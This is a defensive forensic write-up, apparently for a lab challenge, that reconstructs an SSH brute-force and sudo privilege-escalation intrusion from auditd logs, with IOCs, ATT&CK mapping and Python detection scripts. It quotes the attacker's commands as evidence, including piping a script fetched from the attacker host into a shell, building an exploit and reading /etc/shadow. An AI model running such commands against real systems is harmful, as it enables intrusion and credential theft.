Executive Summary

A forensic review of Linux auditd logs confirms that the host was compromised through an external SSH brute-force attack. The attacker authenticated as a low-privileged user, executed automated system enumeration, escalated privileges using a local sudo vulnerability, accessed sensitive credential material, and attempted basic anti-forensic cleanup. The entire intrusion lifecycle occurred within approximately six minutes.


Scope and Evidence

Primary artifact:

  • audit.log (Linux auditd)

Tools used:

  • aureport
  • ausearch
  • Manual timeline correlation

Observed timeframe:

  • 2021-10-04 20:22:07 to 2021-10-04 20:28:06

Initial Triage and Signal Identification

A summary analysis of the audit log shows extreme activity density over a short time window:

  • 87 failed login attempts
  • 89 failed authentication attempts
  • 1,606 failed syscalls
  • 115 unique executables
  • 192 commands executed
  • 10,679 unique process IDs
  • 16,732 total audit events

This volume and velocity of activity are inconsistent with human interaction and strongly indicate automation.

Initial Access Vector

Authentication Activity

Audit records show repeated SSH authentication attempts targeting a single user account.

Targeted account:

  • Username: btlo
  • UID: 1001

Query used to extract the source address of failed attempts:

sudo ausearch --input audit.log -m USER_AUTH,USER_LOGIN \
| grep -E "res=failed|success=no" \
| grep -E "addr=|rhost=" \
| sed -n 's/.*addr=\([^ ]*\).*/\1/p' \
| sort | uniq -c | sort -nr

Source of authentication attempts:

  • IP address: 192.168.4.155
  • Service: /usr/sbin/sshd

Observed pattern:

  • Dozens of failed SSH login attempts
  • One successful authentication from the same source IP

This pattern confirms a successful SSH brute-force attack.
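The failed-then-successful pattern above can be pulled from the raw USER_AUTH/USER_LOGIN records programmatically rather than by eye. The following Python example is added here and is not part of the original report; its records are constructed to mirror the auditd layout (the account name and attacker address follow the report, the serials, PIDs and timestamps are invented).

```python
import re
from collections import defaultdict

# Constructed auditd records in the real USER_AUTH layout (not the report's audit.log):
# three failures then a success for btlo from the attacker IP, plus one unrelated login.
SAMPLE_LOG = """\
type=USER_AUTH msg=audit(1633378927.101:1001): pid=2001 uid=0 auid=4294967295 ses=4294967295 msg='op=PAM:authentication grantors=? acct="btlo" exe="/usr/sbin/sshd" hostname=192.168.4.155 addr=192.168.4.155 terminal=ssh res=failed'
type=USER_AUTH msg=audit(1633378928.205:1002): pid=2002 uid=0 auid=4294967295 ses=4294967295 msg='op=PAM:authentication grantors=? acct="btlo" exe="/usr/sbin/sshd" hostname=192.168.4.155 addr=192.168.4.155 terminal=ssh res=failed'
type=USER_AUTH msg=audit(1633378929.310:1003): pid=2003 uid=0 auid=4294967295 ses=4294967295 msg='op=PAM:authentication grantors=? acct="btlo" exe="/usr/sbin/sshd" hostname=192.168.4.155 addr=192.168.4.155 terminal=ssh res=failed'
type=USER_AUTH msg=audit(1633378930.415:1004): pid=2004 uid=0 auid=4294967295 ses=4294967295 msg='op=PAM:authentication grantors=pam_unix acct="btlo" exe="/usr/sbin/sshd" hostname=192.168.4.155 addr=192.168.4.155 terminal=ssh res=success'
type=USER_AUTH msg=audit(1633378931.520:1005): pid=2005 uid=0 auid=4294967295 ses=4294967295 msg='op=PAM:authentication grantors=pam_unix acct="admin" exe="/usr/sbin/sshd" hostname=10.0.0.7 addr=10.0.0.7 terminal=ssh res=success'
"""

# key=value tokens: double-quoted, single-quoted (the nested msg='...' payload) or bare
KV_RE = re.compile(r"""(\w+)=("[^"]*"|'[^']*'|\S+)""")

def parse_record(text):
    """Flatten one auditd record into a dict, recursing into the quoted msg='...' payload."""
    fields = {}
    for key, value in KV_RE.findall(text):
        if key == "msg" and value.startswith("'"):
            fields.update(parse_record(value[1:-1]))
        else:
            fields[key] = value.strip('"')
    return fields

def detect_bruteforce(log_text, threshold=3):
    """Count failed auths per (addr, acct); flag a success that lands after >= threshold failures."""
    failures = defaultdict(int)
    hits = []
    for line in log_text.splitlines():
        rec = parse_record(line)
        if rec.get("type") not in ("USER_AUTH", "USER_LOGIN"):
            continue
        key = (rec.get("addr"), rec.get("acct"))
        if rec.get("res") == "failed":
            failures[key] += 1
        elif rec.get("res") == "success" and failures.get(key, 0) >= threshold:
            hits.append({"addr": key[0], "acct": key[1], "failures_before_success": failures[key]})
    return dict(failures), hits

if __name__ == "__main__":
    counts, hits = detect_bruteforce(SAMPLE_LOG)
    for (addr, acct), n in counts.items():
        print(f"{n:4d} failed  addr={addr} acct={acct}")
    for h in hits:
        print("brute-force followed by success:", h)
```

Keying on (addr, acct) rather than addr alone keeps a legitimate login from another host from masking the pattern, and the threshold should be tuned to the environment's normal typo rate.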

Post-Compromise Command Activity

Immediately following authentication, terminal (TTY) logs reveal a structured sequence of commands executed by the attacker.

Initial Environment Reconnaissance

Commands observed:

  • hostname
  • whoami
  • ls
  • sudo -l

Purpose:

  • Confirm host identity
  • Identify current privilege level
  • Enumerate accessible files
  • Check sudo permissions and misconfigurations

These commands are typical of post-login validation performed by attackers.

Automated System Enumeration

Shortly after initial recon, the attacker retrieved and executed an enumeration script from the same external IP used during brute-force attempts.

Command observed:

  • wget -O - http://192.168.4.155:8000/linpeas.sh | sh

Source:

  • Remote host: 192.168.4.155
  • Protocol: HTTP
  • Tool delivered: linpeas.sh

Purpose:

  • Automated enumeration of kernel, sudo, SUID, cron, and configuration weaknesses
  • Identification of local privilege escalation vectors

The execution of linpeas explains the subsequent surge in command executions and process creation.

Privilege Escalation Staging

Following enumeration, the attacker staged a local exploit.

Commands observed:

  • wget http://192.168.4.155:8000/evil.tar.gz
  • tar zxvf evil.tar.gz
  • cd evil
  • make

Query used to locate the compiled binary in the aureport process report (columns: event number, date, time, PID, executable, syscall, auid, event ID):

sudo aureport -p -if audit.log | grep 'evil'
16156. 05/10/21 05:57:17 829992 /home/btlo/evil/evil 59 1001 481021

Source:

  • Remote host: 192.168.4.155
  • Payload type: Source code archive

Purpose:

  • Deliver exploit source code
  • Compile exploit locally to evade signature-based detection

Privilege Escalation Execution

The attacker executed the compiled binary. Query used to locate the execution record:

sudo ausearch --input audit.log -m EXECVE | grep evil

Command observed:

  • ./evil 0

Execution metadata:

  • Binary name: evil
  • Execution path: /home/btlo/evil/evil
  • Process ID: 829992
  • Executing user: btlo (UID 1001)

Immediately following execution, the attacker revalidated privileges.

Command observed:

  • whoami

Subsequent actions confirm that the exploit successfully escalated privileges to root.
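The execution record above is spread over a SYSCALL record (PID, uid, auid, exe) and an EXECVE record (argv) that share one audit event ID, and auditd hex-encodes any argv entry containing a space or quote, so a plain grep over raw records can miss a command line. The following Python example is added here and is not part of the original report; it joins the two record types per event and decodes hex arguments. The records are constructed (the PID and path follow the report, timestamps, serials and the second command are invented).

```python
import re
from collections import defaultdict

# Constructed sample records (not the report's audit.log). The second pair runs with
# uid=0 but auid=1001: the login identity survives the privilege escalation.
SAMPLE_LOG = """\
type=SYSCALL msg=audit(1633379177.001:16156): arch=c000003e syscall=59 success=yes exit=0 ppid=829900 pid=829992 auid=1001 uid=1001 gid=1001 tty=pts0 ses=12 comm="evil" exe="/home/btlo/evil/evil" key=(null)
type=EXECVE msg=audit(1633379177.001:16156): argc=2 a0="./evil" a1="0"
type=SYSCALL msg=audit(1633379190.417:16201): arch=c000003e syscall=59 success=yes exit=0 ppid=829992 pid=830010 auid=1001 uid=0 gid=0 tty=pts0 ses=12 comm="sh" exe="/usr/bin/dash" key=(null)
type=EXECVE msg=audit(1633379190.417:16201): argc=3 a0="sh" a1="-c" a2=636174202F6574632F736861646F77
"""

EVENT_RE = re.compile(r"msg=audit\((\d+\.\d+):(\d+)\)")   # (timestamp, serial)
KV_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')

def decode_arg(value):
    """Quoted argv entries are literal; unquoted ones are hex (space/quote/control char inside)."""
    if value.startswith('"'):
        return value.strip('"')
    try:
        return bytes.fromhex(value).decode("utf-8", "replace")
    except ValueError:
        return value   # e.g. (null); very long args split into a1[0], a1[1] are not handled

def reconstruct_execs(log_text):
    """Join SYSCALL + EXECVE records per event ID into one row with pid, uid, auid, exe, cmdline."""
    events = defaultdict(dict)
    for line in log_text.splitlines():
        m = EVENT_RE.search(line)
        if not m:
            continue
        fields = dict(KV_RE.findall(line))
        ev = events[m.group(2)]
        ev["time"] = float(m.group(1))
        if fields.get("type") == "SYSCALL":
            ev.update(pid=int(fields["pid"]), uid=int(fields["uid"]),
                      auid=int(fields["auid"]), exe=fields["exe"].strip('"'))
        elif fields.get("type") == "EXECVE":
            argv = [decode_arg(fields[f"a{i}"]) for i in range(int(fields["argc"]))]
            ev["cmdline"] = " ".join(argv)
    return sorted(events.values(), key=lambda e: e["time"])

if __name__ == "__main__":
    for e in reconstruct_execs(SAMPLE_LOG):
        print(f'{e["time"]:.3f} pid={e["pid"]} uid={e["uid"]} auid={e["auid"]} {e["exe"]} :: {e["cmdline"]}')
```

ausearch -i performs the same hex decoding; the value of doing it yourself is a per-session timeline keyed on auid, which keeps attributing post-escalation commands to the btlo login even once uid is 0.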

Anti-Forensic Cleanup

After achieving elevated privileges, the attacker removed exploit artifacts.

Commands observed:

  • rm -rf /home/btlo/evil
  • rm /home/btlo/evil.tar.gz

Purpose:

  • Remove compiled binary and source code
  • Reduce post-incident forensic artifacts

This cleanup was minimal but deliberate.

Data Access and Impact

With root-level access confirmed, the attacker accessed sensitive credential storage.

Command observed:

  • cat /etc/shadow

Impact:

  • Exposure of password hashes for local accounts
  • Full credential compromise of the host

This action confirms total system compromise and high business impact.

Root Cause Analysis

The attack chain follows a well-established intrusion pattern:

  1. External SSH brute-force attack
  2. Successful authentication as low-privileged user
  3. Manual and automated reconnaissance
  4. Enumeration using linpeas
  5. Local exploit delivery and compilation
  6. Privilege escalation via sudo vulnerability
  7. Credential data access
  8. Anti-forensic artifact removal

The exploit behavior and timeframe align with CVE-2021-3156, a heap-based buffer overflow vulnerability in sudo.

MITRE ATT&CK Mapping

Tactic | Technique ID | Technique Name | Evidence Observed | Notes
Initial Access | T1110.001 | Brute Force: Password Guessing | 87 failed SSH logins, 89 failed auth attempts, single successful login | SSH brute-force against user btlo
Execution | T1059.004 | Command and Scripting Interpreter: Unix Shell | Interactive TTY sessions, shell commands executed | Shell used throughout attack
Discovery | T1082 | System Information Discovery | hostname, lsb_release -a | OS and host identification
Discovery | T1033 | System Owner/User Discovery | whoami (pre and post privesc) | Privilege validation
Discovery | T1083 | File and Directory Discovery | ls, find, grep, sed, cut, sort, uniq | Automated enumeration
Privilege Escalation | T1068 | Exploitation for Privilege Escalation | Execution of local exploit binary evil | Exploitation of sudo vulnerability
Command and Control | T1105 | Ingress Tool Transfer | wget downloads from attacker host | Tool and payload delivery
Defense Evasion | T1070.004 | Indicator Removal on Host: File Deletion | rm -rf exploit directory and archive | Anti-forensic cleanup
Credential Access | T1003.008 | OS Credential Dumping: /etc/shadow | cat /etc/shadow | Credential exposure

Indicators of Compromise (IOCs)

Network IOCs

Type | Indicator | Description
IP Address | 192.168.4.155 | Source of brute-force and payload delivery
URL | http://192.168.4.155:8000/linpeas.sh | Enumeration script
URL | http://192.168.4.155:8000/evil.tar.gz | Privilege escalation payload
Protocol | SSH | Initial access vector
Protocol | HTTP | Tool and payload transfer

Host-Based IOCs

Type | Indicator | Description
User Account | btlo | Compromised user
Process | evil | Privilege escalation binary
Process ID | 829992 | PID of exploit execution
File Path | /home/btlo/evil/evil | Compiled exploit binary
File Path | /home/btlo/evil.tar.gz | Exploit archive
File Access | /etc/shadow | Sensitive credential file accessed
Tool | linpeas.sh | Automated enumeration script

Behavioral IOCs

Behavior | Description
SSH brute-force pattern | High-volume failed SSH logins from single IP
Automated enumeration | Large volume of filesystem and command execution
Local compilation | make/gcc execution in user home directory
Privilege transition | whoami before and after exploit execution
Anti-forensics | Immediate deletion of exploit artifacts

Challenge Submission

  • Compromised account: btlo
  • Initial access technique: SSH brute-force attack
  • Attacker IP: 192.168.4.155
  • Enumeration tool: linpeas
  • Privilege escalation binary & PID: evil, PID 829992
  • CVE exploited: CVE-2021-3156
  • Vulnerability type: Heap-based buffer overflow (Local Privilege Escalation)
  • Exfiltrated file: /etc/shadow


Conclusion

This incident demonstrates how a combination of weak authentication controls and unpatched local vulnerabilities can lead to rapid and complete system compromise. Despite the absence of a SIEM or EDR platform, auditd logs provided sufficient telemetry to reconstruct the attacker’s full kill chain with high confidence.

The case reinforces the importance of:

  • SSH hardening and rate limiting
  • Strong password policies
  • Timely patching of privilege escalation vulnerabilities
  • Retention and review of auditd logs for forensic readiness